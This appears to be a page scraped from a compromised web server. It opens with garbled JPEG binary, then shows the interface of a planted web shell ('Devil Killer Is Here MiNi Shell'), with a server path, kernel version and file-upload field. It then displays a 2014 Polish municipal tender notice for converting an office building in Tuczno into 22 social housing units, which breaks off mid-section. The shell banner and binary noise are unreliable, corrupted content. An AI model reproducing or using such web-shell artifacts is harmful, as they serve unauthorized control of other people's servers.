JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141002/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141002/208405-N-2014.html

<p class="kh_header"><b>Złotniki Kujawskie: Przebudowa budynku biurowego wraz ze zmianą sposobu użytkowania na budynek mieszkalny oraz na budowie budynku gospodarczego (komórki lokatorskie) w Tucznie przy ul.Bocznej  gm.Złotniki Kujawskie</b><br>
<b>Numer ogłoszenia: 208405 - 2014; data zamieszczenia: 02.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złotniki Kujawskie , ul. Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie, woj. kujawsko-pomorskie, tel. 52 35 17 160, faks 52 35 17 160 wew. 51.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa budynku biurowego wraz ze zmianą sposobu użytkowania na budynek mieszkalny oraz na budowie budynku gospodarczego (komórki lokatorskie) w Tucznie przy ul.Bocznej  gm.Złotniki Kujawskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Przebudowa budynku biurowego wraz ze zmianą sposobu użytkowania na budynek mieszkaniowy oraz na budowie budynku gospodarczego (komórki lokatorskie) w Tucznie przy ul.Bocznej na działce  nr 136/4, w wyniku którego powstaną 22 lokale socjalne o łącznej powierzchni użytkowej 712,44 m 2, w tym powierzchni użytkowej ww. lokali 660,30 m 2 . 
Zakres zamówienia obejmuje:Przebudowę budynku biurowego wraz ze zmianą sposobu użytkowania na budynek mieszkaniowy oraz na budowie budynku gospodarczego (komórki lokatorskie) w Tucznie przy ul.Bocznej.
A.ARCHITEKTURA zagospodarowanie terenu w zakresie:
-  przebudowa, remont i adaptacja  byłego budynku biurowego z przeznaczeniem na lokale socjalne  o dwóch kondygnacjach nadziemnych z nieużytkowym poddaszem, bez podpiwniczenia,
- częściowy remont  i modernizacja  istniejących funkcji apteki i gabinetów lekarskich,
- opaska budynku o szerokości 0,5 m betonowa ze spadkiem 2% od budynku,
- wykonanie 26 budynków gospodarczych w tym: 22 lokatorskie i 4 wózkownie i 
  rowerownie,
- wydzielenie miejsc postojowych od zachodniej  granicy działki w postaci 2 miejsc  
  parkingowych z przeznaczeniem dla osób niepełnosprawnych,
- wydzielenie miejsc do gromadzenia odpadów stałych w postaci placu gospodarczego z   kontenerem trzykomorowym i trzepakiem,
- utworzenie pochylni dostosowanej dla osób niepełnosprawnych o wym.  szerokość 1,20 m i spadku 5%,
- wykonanie zewnętrznej klatki schodowej ewakuacyjnej dwubiegowej o szerokości biegu    120,0 cm,  wysokość stopni 17,5 cm, szerokość 26 cm, wymiary spocznika  270x155 cm,
- wykonanie nowych chodników i dojść do budynku,
- przebudowa istniejących  terenów utwardzonych i zieleni,
- wymiana instalacji sanitarnych,
- przebudowa  wewnętrznej sieci zasilającej budynek w energię elektryczną
- wykonanie infrastruktury technicznej do budynku tj.kanalizacyjnej  i elektrycznej, (przyłącze wodociągowe jest wykonane).
B.ARCHITEKTURA BUDYNKU
- w nowo zaprojektowanym budynku będzie wydzielonych 22 lokali mieszkalnych socjalnych z łazienkami i aneksami kuchennymi lub wydzielonymi kuchniami,
- częściowy remont i modernizacja istniejących funkcji apteki i gabinetów lekarskich,
-  na parterze budynku należy zamurować część otworów drzwiowych, niektóre okna podmurować ,
- wykonanie nowych ścianek działowych ,
- powiększeniu ulegnie kilka otworów okiennych i drzwiowych w tym celu niezbędne będzie osadzenie nowych nadproży,
- należy skuć posadzkę i wykonać nowe warstwy posadzkowe  zgodnie z rysunkami 
  wykonawczymi,
- wymiana starych drewnianych schodów na piętro na nowe żelbetowe,
- na piętrze należy wyburzyć część ścianek działowych, zamurować niektóre otwory  
  drzwiowe i wykonać nowe przebicia  w ścianach,
- niektóre okna należy podmurować , 
- okna które zostały zamurowane pustakami, należy na nowo wykuć,
- wykonanie ścianek działowych  w systemie lekkiej zabudowy,
- w całym budynku należy skuć wszystkie tynki wewnętrzne, a następnie osuszyć i odgrzybić,
- w stropie nad parterem należy zerwać deski podłogowe i usunąć polepe,
- belki stropowe oczyścić i zabezpieczyć środkiem przeciw działaniu grzybów, owadów i   ognia,
- zamontowanie dodatkowych belek stropowych  z drewna klasy C24 zgodnie z rysunkiem   konstrukcyjnym,
- w stropie nad piętrem usunąć polepę glinianą  i rozebrać podsufitkę,
- belki stropowe, które uległy korozji  biologicznej trzeba wymienić , a belki w dobrym stanie   należy oczyścić  i zabezpieczyć przed działaniem grzybów, owadów i ognia, strop wykonać  zgodnie z rysunkiem  konstrukcyjnym,
- na poddaszu należy usunąć tynk z sufitu oraz deski przybite do krokwi, następnie sprawdzić   stan krokwi  i wymienić te które uległy korozji, 
- płatew dachową należ zastąpić belką stalową HEA 180  więźbę wykonać zgodnie z 
  rysunkami konstrukcyjnymi,
- usunąć pokrycie dachowe  wraz z deskowaniem  i wykonać je na nowo z dwóch warstw  papy termozgrzewalnej,
- ścieki bytowe odprowadzić do sieci kanalizacyjnej,
- wykonać izolacje przeciwwilgociowe i przeciwwodne: a) posadzek na gruncie  folia PE na   podłożu betonowym oraz folia PE na styropianie, b) pionowa ścian zagłębionych w gruncie   powłokowa, dyspersyjna masa asfaltowo-kauczukowa, c) dachu folia paroszczelna  pod  wełną mineralną luzem na stropie poddasza nieużytkowego,
- wykonać izolacje termiczne: a) ścian zewnętrznych styropian fasadowy gr 15 cm, b) ścian   fundamentowych styropian EPS 038 gr 10 cm, c) nadproży zewnętrznych styropian   fasadowy gr 15 cm, d) posadzki na gruncie styropian EPS 038 gr 10 cm,
- tynki wewnętrzne skucie wszystkich tynków, osuszenie i i odgrzybienie  oraz wykonanie nowych tynków, dla ścian przewiduje się tynki gipsowe maszynowe,
- sufity podwieszane ze względów p.poz dla obu stropów z płyt GKF na ruszcie stalowym o odporności ogniowej REI 30,
- malowanie pomieszczeń: 
  a) pomieszczenia pokoi ściany malowane farbą emulsyjną , 
  b) pomieszczenia pokoju z aneksem płytki ceramiczne  ścienne w postaci poziomego pasa    ponad szafkami kuchennymi wys. 60 cm od blatów, pozostałe ściany malowane  farbą     emulsyjną,
  c) łazienki płytki ceramiczne ścienne do wysokości 2,0 m powyżej malowane  farbą 
     emulsyjna,
  d) komunikacja  lamperia do wys. 1,60 m powyżej malowane farbą emulsyjna ,
  e) komórka lokatorska  ściany malowane farbą emulsyjna,
- posadzki :
  a) łazienka, kuchnia, komunikacja terakota,
  b) pokój panele podłogowe, dookoła pieców terakota na pasie szerokości  50 cm zgodnie z rysunkiem szczegółu architektury,
c) aneks kuchenny w pokoju terakota na szerokości 80  100 cm od szafek kuchennych,
d) komórka lokatorska  terakota
- stolarka i ślusarka
  a) Okna  indywidualne PCV w kolorze białym pięciokomorowe, szyba zespolona 1.0 o 
      współczynniku przenikania  ciepła nie gorszym niż K=1,0w m2K we wszystkich oknach nawiewniki higrosterowane, okna wyposażone w szybę zespoloną jednokomorową,  
      grubość szyby 4 mm,  parapety okienne  z PCV w kolorze białym,
  b) Stolarka drzwiowa : drzwi okleinowane (okleina CPL min. 0,2 m ),okleina   
      drewnopodobna dąb ,wypełnienie z płyty wiórowej otworowej , trzy zawiasy,  
      wyposażone w klamki metalowe z rozetą kolor srebrny matowy z wkładką patentową klasy C, ościeżnice drewniane, systemowe , regulowane o szerokości w zależności od grubości ściany w kolorze skrzydła  drzwiowego, do łazienek drzwi  z otworami      wentylacyjnymi,
- wykończenie zewnętrzne: 
  a) ściany zewnętrzne kondygnacji nadziemnych  tynk akrylowy, malowany farbami 
      silikatowymi w kolorze kremowym, 
  b) rury spustowe rynny, obróbki blacharskie wykonane z blachy powlekanej (rynny stalowe  O 150 , rury spustowe stalowe O 120),
  c) parapety zewnętrzne z blachy stalowej  powlekane fabrycznie  w kolorze białym,
  d) na dachu papa zgrzewalna 
- schody:
  a) schody wewnętrzne w nowoprojektowanej klatce schodowej  schody jednobiegunowe, szerokość biegu netto bez balustrad 125 cm, z balustradami 120 cm, wysokoć stopni 17,5  cm, wysokość balustrady 110 cm,
 b) schody zewnętrzne ażurowe  dwubiegowe, szerokość biegu 120 cm, wysokość stopni 17,5 cm, szerokość 26 cm, wysokość balustrady 110 cm, wielkość spocznika  270x155 cm zgodnie z rysunkami architektury,
- pochylnia przed wejściem do budynku zaprojektowano pochylnie dostosowaną dla osób niepełnosprawnych, szerokość biegu netto bez balustrady  120 cm, z obustronnymi balustradami  105 cm, długość pochylni  8,55 m, wysokość 0,43 m, spadek 5%, obustronne balustrady,
- wyposażenie instalacyjne budynku: instalacja wody zimnej, instalacja ciepłej wody 
  użytkowej, instalacja kanalizacji sanitarnej, instalacje c.o., instalacja wentylacji, wewnętrzne  instalacje elektryczne.
C.BUDYNEK GOSPODARCZY  (KOMÓRKI LOKATORSKIE)
- budynek gospodarczy (komórki lokatorskie) składa się z 26 modułów o wym. 1,30 x2,00 m z drzwiami jednoskrzydłowymi z uchwytem na kłódkę .Obiekt o długości 33,8 m wykonać w konstrukcji stalowej pokryć i poryć blachą trapezową ocynkowaną T 7, pokrycie dachu wykonać ze spadkiem do tyłu 11,5% z blachy trapezowej T 14, budynek posadowić na płycie betonowej o wymiarach 40x40x3 mm gr 0,10 m z betonu C16/20.
D.BRANŻA SANITARNA 
d.1. Instalacja wody zimnej woda zimna na cele bytowo gospodarcze dostarczana będzie do instalacji wodociągowej  budynku z zewnętrznej instalacji za pośrednictwem przyłącza. Dla pomiaru zużycia wody w poszczególnych lokalach mieszkaniowych zaprojektowano wodomierze indywidualne jednostrumieniowe do wody zimnej , które instalować należy na odgałęzieniach instalacji do poszczególnych mieszkań w szafkach na korytarzach. Przed wodomierzem montować zawory kulowe DN 15 oraz filtry siatkowe DN15. Wszystkie rurociągi wody zimnej należy otulić izolacją przeciwroszeniową. Rurociągi doprowadzające  wodę do przyborów sanitarnych należy prowadzić pod stropem kondygnacji oraz wykutych bruzdach ściennych. Przewidywana do zastosowania armatura to baterie umywalkowe, zlewozmywakowe, natryskowe, zawory kątowe do misek ustępowych. Po zakończeniu prac i przetestowaniu na nieszczelności przewodów i armatury  należy wykonać próbę hydrauliczną  na ciśnienie. Po pomyślnym wyniku próby instalację należy zdezynfekować  i przeprowadzić badania bakteriologiczne i fizyko chemiczne.
d.2. instalacje ciepłej wody użytkowej woda ciepła dostarczana będzie do punktów poboru z pojemnościowych podgrzewaczy wody. Rurociągi instalacji ciepłej wody  na całej długości izolować termicznie  otuliną z pianki poliuretanowej. Należy wykonać próbę hydrauliczną  na ciśnienie.
d.3. instalacja kanalizacji sanitarnej ścieki bytowo gospodarcze z budynku odprowadzane będą grawitacyjnie przewodem  do przyłącza kanalizacji sanitarnej. Kanalizację sanitarną zaprojektowano z rur PCV kielichowych łączonych na uszczelki. Piony i podejścia do przyborów sanitarnych wykonać  z rur PCV. Piony kanalizacyjne wyprowadzone ponad dach  zakończyć kominkiem wywiewnym. Piony wyprowadzone ponad połać dachową  należy lokalizować w normatywnych  odległościach od okien. Na każdym pionie montować rewizje kanalizacyjne zabezpieczone drzwiczkami rewizyjnymi.
d.4. Instalacja grzewcza mieszkania ogrzewane będą indywidualnie: 
a) mieszkania jednopokojowe (niektóre z lokali)  piecyk kominkowy, grzejnik elektryczny bryzgoodporny,
b) mieszkania jednopokojowe (niektóre z lokali) piecyk kominkowy,
c) mieszkania dwupokojowe piecyk kominkowy, grzejnik elektryczny ścienny
Piece na paliwo stałe  charakterystyka pieca:  moc cieplna 5,1 kW, wymiary pieca 390x390x780 mm, powierzchnia grzewcza 30 m 2, średnica króćca wylotowego 120 mm.
d.5.Instalacja wentylacji w pomieszczeniach przewidziana jest wentylacja grawitacyjna  poprzez kanały wentylacyjne zakończone kratkami wywiewnymi. Dla pomieszczeń lokali mieszkalnych , w których zlokalizowano piece kominkowe przewiduje się systemowe  murowane kominy spalinowe. Aby uniknąć nawiewania powietrza  zewnętrznego w wymaganej ilości bezpośrednio do lokali mieszkalnych przewiduje się wykonanie otworów zlokalizowanych w ścianie komunikacji na parterze i I piętrze. Otwory wykonać pod stropem kondygnacji. W celu rozprowadzenia powietrza zewnętrznego na Pietrze wykonać otwór w ścianie zewnętrznej oraz przeprowadzić kanał spiro O 150 mm przez klatkę schodową, kanał zakończyć kratkami. Dopływ świeżego powietrza do pomieszczeń mieszkalnych odbywać się będzie z komunikacji poprzez podcięcie drzwi każdego z mieszkań oraz poprzez nawiewniki higrosterowane.
E.INSTALACJA ELEKTRYCZNA
E.1. Zasilanie budynku: budynek zasilany będzie z skrzyni kablowej SK3 usytuowanej przy zewnętrznej ścianie budynku w pobliżu klatki schodowej. Zgodnie z warunkami przyłączenia do sieci wykonanie skrzyni kablowej i zewnętrzna linia kablowa zostanie wykonana przez zakład energetyczny w ramach umowy przyłączeniowej. Od skrzyni kablowej należy wyprowadzić wewnętrzną linie zasilająca typu YKY 4x70 mm2, do głównej tablicy rozdzielczej budynku, przepust wykonać rurą DVK 75.
E.2.Tablica Główna  Rozdzielcza GTR budynku znajdować się będzie w pomieszczeniu komunikacji na parterze budynku. Należy ja wykonywać jako natynkowa, metalową, zamykana drzwiami metalowymi na klucz o stopniu ochrony min IP40. Drzwi obudowy powinny posiadać otwory rewizyjne dla umożliwienia odczytu licznika administracyjnego i przychodni apteki. W tablicy należy umieścić wyłącznik główny z wyzwalaczem wzrostowym, ogranicznik przepięć klasy I+II, rozłączniki bezpiecznikowe dla wewnętrznych linii zasilających, liczniki energii elektrycznej dla obwodów administracyjnych  i przychodni apteki. Kable i przewody należy doprowadzić do rozdzielnicy poprzez dławice uszczelniające. Przewody oraz części będące pod napięciem powinny być maskowane i niedostępne dla ludzi. Wszystkie obwody powinny być opisane, w wydzielonym fragmencie obudowy należy przewidzieć miejsce dla tablicy administracyjnej.
E.3.Tablice licznikowe TL  wykonać w formie szaf podtynkowych, obudowy metalowe o stopniu ochrony min IP40. Drzwi obudowy  powinny posiadać otwory rewizyjne dla umożliwienia odczytu liczników energii elektrycznej. W tablicy należy umieścić listwy rozdzielcze, liczniki energii elektrycznej oraz zabezpieczenia przelicznikowe i rozłączniki izolacyjne. W tablicach znajdujących się na piętrze budynku należy zabudować  ograniczniki przepięć klasy II. Listwę rozdzielczą, liczniki i zabezpieczenia przelicznikowe należy przystosować do plombowania.
E.4. Tablice mieszkaniowe TM znajdować się będą w korytarzach poszczególnych mieszkań. Należy je wykonać, jako podtynkowe, z materiału izolacyjnego ( o drugiej klasie izolacji), z drzwiami transparentnymi zamykanymi na zatrzask.Przewiduje się szafkę na 18 modułów. W tablicy mieszkaniowej znajdować się będą  głównie takie  aparaty jak rozłącznik główny,wyłączniki nadprądowe, wyłącznik różnicowoprądowy, dzwonek. Kable i przewody doprowadzić do tablicy pod tynkiem. Przewody oraz części będące pod napięciem powinny być maskowane i niedostępne dla ludzi. Wszystkie zabezpieczenia powinny być opisane by umożliwić łatwą identyfikacje obwodu przez użytkownika.
E.5. Tablica administracyjna T ADM należy zabudować w wydzielonym fragmencie GTR, zamykana osobnymi drzwiami. Kable i przewody należy doprowadzić  do tablicy pod tynkiem wykorzystując otwory pomiędzy elementami konstrukcyjnymi obudowy. Przewody oraz części będące pod napięciem powinny być maskowanei niedostępne dla ludzi. Wszystkie zabezpieczenia powinny być opisane, by umożliwić łatwą identyfikację obwodu przez użytkownika.
E.6. Instalacje oświetlenia wykonane przewodami YDYżo 3x1,5 mm2 układane pod tynkiem.Dla oświetlenia pomieszczeń mieszkalnych przewiduje się oprawy z świetlówkami kompaktowymi. Na klatkach schodowych i komunikacji budynku należy zastosować oprawy wyposażone w własny czujnik zmierzchowy i czujnik ruchu. Na zewnątrz budynku nad wejściem zastosować oprawy z przesłona z świetlówką kompaktową 1x21W jako numer policyjny zastosować oprawę, oprawy zewnętrzne sterowane będą z zegara astronomicznego umieszczonego w tablicy administracyjnej. Łączniki we wszystkich pomieszczeniach montować na wysokości 1,4 m.
E.7. Czujnik tlenku węgla w pomieszczeniach, w których znajdują się piece należy zastosować autonomiczne czujniki tlenu węgla. Czujniki montować na wysokości 2,2 m w pobliżu pieców. Dla zasilania czujników zostało przewidziane wydzielone gniazdo. Gniazdo zabudować na wysokości 2,2 m.
E.8.Instalacje siły i gniazd wtykowych, wewnętrzne linie zasilające: w budynku przewiduje się następujące instalacje siłowe: zasilanie budynku, zasilanie tablic licznikowych, zasilanie istniejącej tablicy przychodni apteki. Kabel zasilający budynek należy układać w rurze DVK70 pod posadzką. Wewnętrzne linie zasilające należy układać pod tynkiem w rurach ochronnych. Od tablic licznikowych do tablic mieszkaniowych należy ułożyć przewody YLYźo 3x10 mm2 ułożone pod tynkiem lub na korycie dachowym w przestrzeni między stropowej. Przejścia przewodów i wewnętrznych linii zasilających  przez strefy pożarowe uszczelnić masą ogniotrwałą. Gniazda ogólne jednofazowe należy wykonać jako podtynkowe z bolcem ochronnym PE. W łazienkach stosować gniazda IP 44 (bryzgoszczelne). Instalacje gniazd wtykowych należy wykonać przewodami YDYżo3x2,5 mm2 ułozonymi pod tynkiem..
E.9. Instalacja ochrony przeciwprzepięciowej: układ ochrony przeciwprzepięciowej dla przedmiotowego budynku składa się z ogranicznika  przepięć klasy I+II znajdującego  się w głównej tablicy rozdzielczej. W tablicach znajdujących się na piętrze budynku zastosować ograniczniki przepięć klasy II.
E.10. Instalacje odgromową należy wykonać w postaci siatki nieizolowanych zwodów poziomych, przewody odprowadzające układać pod tynkiem. Przewody odprowadzające połączyć z uziomem otokowym poprzez zaciski kontrolne, które należy umieścić na wysokości 0,6 m w zamykanej metalowymi drzwiami wnęce o wymiarach 200x200. Wszystkie wystające elementy na dachu połączyć z siatką zwodów. Na dachu budynku w pobliżu kominów stosować pionowe pręty o wysokości 1m mocowane do komina. Do uziomu otokowego podłączyć główną szynę wyrównawczą, pręty podłączyć do siatki zwodów.
E.11. Instalacja ochrony od porażeń i połączenia wyrównawcze: jako dodatkową ochronę od porażeń prądem elektrycznym przyjęto samoczynne wyłączenie zasilania w układzie TN C S. Rozdziału sieci z TN C dokonać w GTR budynku, punkt rozdziału uziemić. Ochronie podlegają bolce ochronne gniazd wtykowych, metalowe korpusy urządzeń, metalowe obudowy opraw oświetleniowych. Dodatkowo jako zabezpieczenie  przed porażeniem zastosowano wyłączniki z funkcją różnicowoprądową.
E.12.Instalacja telewizyjna dla mieszkań: instalacja RTV przewiduje odbiór  sygnałów telewizji naziemnej cyfrowej oraz sygnału radiowego w gniazdach abonenckich w poszczególnych mieszkaniach. Na system składają się  anteny,  zwrotnica do sumowania sygnału radiowego i telewizji naziemnej, wzmacniacz RTV, rozgałęźnik sygnału , odgałęźnik sygnału, gniazda abonenckie końcowe. Przewody układać  w korytarzu na parterze, w korytarzach na piętrze, w pomieszczeniach i piony. Gniazda abonenckie  RTV montować w standartowych oprawach podtynkowych na wysokości około 0,3 m od posadzki. Anteny i zwrotnice zabudować na dachu w zaznaczonym miejscu na konstrukcji wsporczej. Wzmacniacz wraz z rozgałęźnikiem i jednym z odgałęźników  należy zabudować w szafce wykonanej  z blachy , zamykanej drzwiami na klucz o wymiarach 400x400x200. Pozostałe odgałęźniki zabudować w szafkach wykonanych z blachy zamykanych na klucz o wymiarach 200x200x100.Szafki należy wyposażyć w płytę montażową. Anteny odbiorcze zainstalować na maszcie antenowym o wysokości 3 m z odciągami, wykonanymi z linki stalowej. Maszt zamontować  w podstawie pozwalającej na jego położenie  w celu prowadzenia  montażu i konserwacji anten.
F.Obsługa geodezyjna z inwentaryzacją powykonawczą 1 kpl
Szczegółowy zakres zamówienia zawiera dokumentacja projektowa, specyfikacja techniczna wykonania i odbioru robót, wymagania zawarte w siwz, natomiast przedmiar robót jest  elementem pomocniczym.
Przedmiary robót stanowią dokumenty pomocnicze do wyceny zadania.
Załączniki do SIWZ:
Przedmiar robót  Załączniki nr 9
Dokumentacja projektowa Załącznik nr 10
a) Projekt wykonawczy branża: architektura Plan zagospodarowania terenu
b) Projekt wykonawczy branża: architektura Przebudowa, remont i adaptacja  byłego budynku biurowego z przeznaczeniem na lokale socjalne w m.Tuczno ul.Boczna 
c) Projekt wykonawczy branża: konstrukcje budowlane Przebudowa, remont i adaptacja  byłego budynku biurowego z przeznaczeniem na lokale socjalne w m.Tuczno ul.Boczna
d) Projekt wykonawczy branża: sanitarna Przebudowa, remont i adaptacja  byłego budynku biurowego z przeznaczeniem na lokale socjalne w m.Tuczno ul.Boczna
e) Projekt wykonawczy branża: instalacje elektryczne Przebudowa, remont i adaptacja  byłego budynku biurowego z przeznaczeniem na lokale socjalne w m.Tuczno ul.Boczna
f) Projekt wykonawczy  branża sanitarna  przyłącza wod kan 
g) Plan bezpieczeństwa i ochrony zdrowia
h) Specyfikacja Techniczna Wykonania i Odbioru Robót branża: instalacje elektryczne
i) Specyfikacja Techniczna Wykonania i Odbioru Robót branża: sanitarna  instalacje wewnętrzne
j) Specyfikacja Techniczna Wykonania i Odbioru Robót branża: budowlana.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.23.11.30-1, 45.33.22.00-5, 45.23.13.00-8, 45.33.12.00-8, 45.32.00.00-6, 45.32.10.00-3, 45.33.10.00-6, 45.30.00.00-0, 45.31.00.00-3, 45.31.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 30.000,00 zł
słownie: trzydzieści tysięcy złotych.Wykonawca ubiegający  się o udzielenie zamówienia zobowiązany jest do wniesienia wadium przed upływem terminu składania ofert tj. do dnia 17.10.2014 r.  do godz.11:00.Wadium może być wniesione w jednej lub kilku następujących formach, w zależności od  wyboru Wykonawcy:pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy musi być poręczeniem pieniężnym,gwarancjach bankowych, gwarancjach ubezpieczeniowych - poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 
ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju        
Przedsiębiorczości Dz. U. Nr 109, poz. 1158  z późn. zm. Wadium wnoszone w pieniądzu musi być wpłacone przelewem na rachunek bankowy Zamawiającego -  Bank Spółdzielczy Bydgoszcz Oddział  Złotniki Kujawskie konto  depozytowe Nr 32 81 42 10 59 0000 19  35 2000 0004  z dopiskiem Przetarg na przebudowę  budynku biurowego wraz ze zmianą sposobu użytkowania na budynek mieszkalny oraz budowa budynku gospodarczego ( komórki lokatorskie) w Tucznie przy ul.Bocznej.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
